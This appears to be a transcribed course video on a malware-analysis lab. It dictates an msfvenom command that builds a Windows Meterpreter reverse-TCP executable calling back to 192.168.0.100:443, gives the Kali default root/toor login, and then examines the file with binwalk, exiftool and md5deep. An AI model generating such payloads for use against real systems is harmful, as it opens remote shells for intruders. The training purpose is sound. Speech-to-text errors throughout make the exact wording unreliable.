9 hours 54 minutes
Hey, everyone, welcome back to the core. So in the last video, we take a look at how control number eight form our defenses. How that mapped after the next cybersecurity framework. In this video, we're to do a simple lab where we analyze and classify malware. So we're basically going to be creating and execute herbal and then analyzing that execute herbal file.
So make sure your loved into the cyber lab environment and sees the inside of your cyber account. And then once you do so, search for the analyzing classified Mauer Lab. Once you locate, that's like the launch button, and the launch item button usually takes about 30 seconds to a minute for the lab. The launch and then you'll see the screen like we have behind me right there.
Now these step by step lab guides, as usual, are in the resource is section of the course. If you have any trouble downloading those peace reset to the support team.
So once you're loved into the lab, go ahead and log into the Cali machine, so just click the other option there, and then we're gonna log in with the traditional Callie credentials, which is the user Name of root R o t All over case and then the password of tour T o r. Although case
and you'll see us step by step lab guide here. I've also got that listed out for you as well.
So it's going to take a moment or so for the Cali desktop to boot up for us. Once it pulls up for us here, we're going to select the terminal icon just to launch the terminal for us. And then what we're going to do is go ahead and create our malicious execute herbal file.
So we're gonna like the terminal icon right here. It's this little black box. Just go ahead and select that. That will open the terminal prompt for you.
And there were gonna be typing this long command right here. I'm gonna read through it, and then we'll just go ahead and type it in our command. Prompt. So feel free to pause the video here and type in this entire command. But we're gonna be typing in MSF venom
Space dash lower case a space. Lower case X 86
space. Lower case. Dash platform space windows space dash P space windows Ford slash interpreter for it slash reverse underscore TCP space capital l host equals And then this i p address space capital l port equals And then this port number right here for 43
space dash lower case F space e X e
space dash lower case oh, space and then malicious file dot t x c. That's a whole lot to say and a whole lot to type fence, and we'll get started on that one thing before we do. So I want to mention is Be sure as you're going through this lab of following the steps. Be sure to click through the menu options here and select them
as you go throwing and complete each area.
Make sure you go ahead and select those You could get full completion for the lab. Once you're done, you'll notice that I'm not going to do that. The rest of these throughout this lab, because I'm not worried about saving this lab. But be sure to do it on your end. She could get full credit for completing this lab,
so let's go ahead and get started here. So again, pause a video here and you could type in the command yourself if you want to.
Otherwise you can follow along as I type it in. So we're gonna type in lower case MSF venom,
a space lower case. Dash a
space lower case X in the number 86 altogether
space, and we're gonna put two dashes
and then the word platform
space dash Lower case P
space windows, ford slash
another Ford slash and then reverse the underscore symbol. And then TCP
space capital l host
the equal sign. And then the i p address I mentioned before. So the 1 92 168.0 dot 100
we'll put another space, and then we're gonna specify the port number, so l port all caps
equals 4 43
space dash lower case f
space e X e Oliver case Space dash. Oh,
and then finally space malicious
file dot He xy
Now, in the real world, you're not gonna normally find malware that's listed as malicious file dot Txt right. It's not that simple, but for our purposes, that's what really name it in this lab. So once you typed all of that and again, you can pause a video. Take your time typing that in,
uh, and didn't just restart the video. Once you're done, once you've typed all that in, just hit the enter key there. It's going to take a little bit to create this file for us. Once it does, we're just gonna verify that it's actually created the file for us. So I'm gonna briefly pause a video while we wait and it to create that file.
All right, so we see that is created the malicious filed on e x e. Let's go ahead and verify that. So we're just going to use the l s command toe list out the files, and we see there. Once we do that, we see malicious file dot txt is successfully created,
so let's go back to our step by step lab guys, we've done step seven here. That's where we typed in this long command to create our malicious execute herbal. We then just typed ls at the prompt. I'm gonna type in clear. You don't necessarily have to type in clear. I just like to keep my terminal pretty clear as I'm entering different commands.
The next step we're going to do is we're gonna start analyzing the files were to use a tool called been Walks. We're just gonna type in, been walk space, dash Capital B and then the space and then in the name of our file.
So let's go ahead and do that. Now we're gonna type in been walk space, dash Capital B and then the file name malicious file dot e x e
Just hit the enter key. There s a lot because that's just going to analyze a file for some common signatures for us.
All right, the next thing we're going to do is here in step 11 where to use been walk again. We're gonna put a dash three this time, and then we're going to take a look at that same malicious file.
So let's type that in. So been walk
space Dash three and then space, malicious file
dot e x e.
And so again, we're just analyzing here. We could get some basic data back about this particular file
and you'll see here that this gives us a visual of the file. So I always like to think of this as if you're a fan of Star Trek. The next generation this looks like a Borg ship to me. You see, it's kind of cube like that. So it just gives us a graphic of what this malicious file looks like.
So you can just go You can play around with, I just click on it and drag it around, and you could spend it all different ways and show your friends and everything. But for our purposes, you could just go ahead and close this out once you're done with it.
So let's go back to our step by step lab guide here. The next thing we're going to do is type in, been walk space, dash Capital A and then we're basically gonna be looking for any up codes at all. So let's take a look here. So been walk
space, dash capital A And then again, space and our file name Malicious file. Dottie XY.
All right, so we can take a look there and we see the hex that we get back. So
do you see any? Do you see any No operation up codes. Uh,
we do see some right there.
So step 13 we're gonna type in X. If tool space motions filed out, he xy
and then our final step of this lab is actually just performing a hash on the file itself.
So as you're analyzing malicious files, always good to get a hash of them so you can share that with others later on. And also put it in your ideas. I ps systems.
So accept tool.
It's police malicious file
dot he xy
and you'll see it will also give us some basic information about this particular file as well.
So, as I mentioned the very final step in this lavishes typing in to perform a hash, we're gonna do that with MD five deep. So just type in MD five deep, and then space and then malicious file dot e x e So empty five deep all over case
and then a space in the file name itself. So malicious file dot He xy
All right, so you see there we've performed the house of our file.
So in this video, we just took a look at creating a malicious file again. It was very simple, executed all file, and we normally wouldn't name it. Malicious file. Don t x c. We just took a look at at at it, though we created. And then we went ahead and analyze a file through a few various tools.
In the next video, we're gonna take a look at Control number nine, which is regarding network ports, protocols and services.
Incident Response Lifecycle
Want to build on your foundational knowledge of cybersecurity incident response? By taking this Incident ...
5 CEU/CPE Hours Available
Certificate of Completion Offered
Risk Management and Information Systems Control
In this Cybersecurity risk management training course, students will come to understand the value of ...
1 CEU/CPE Hours Available
Certificate of Completion Offered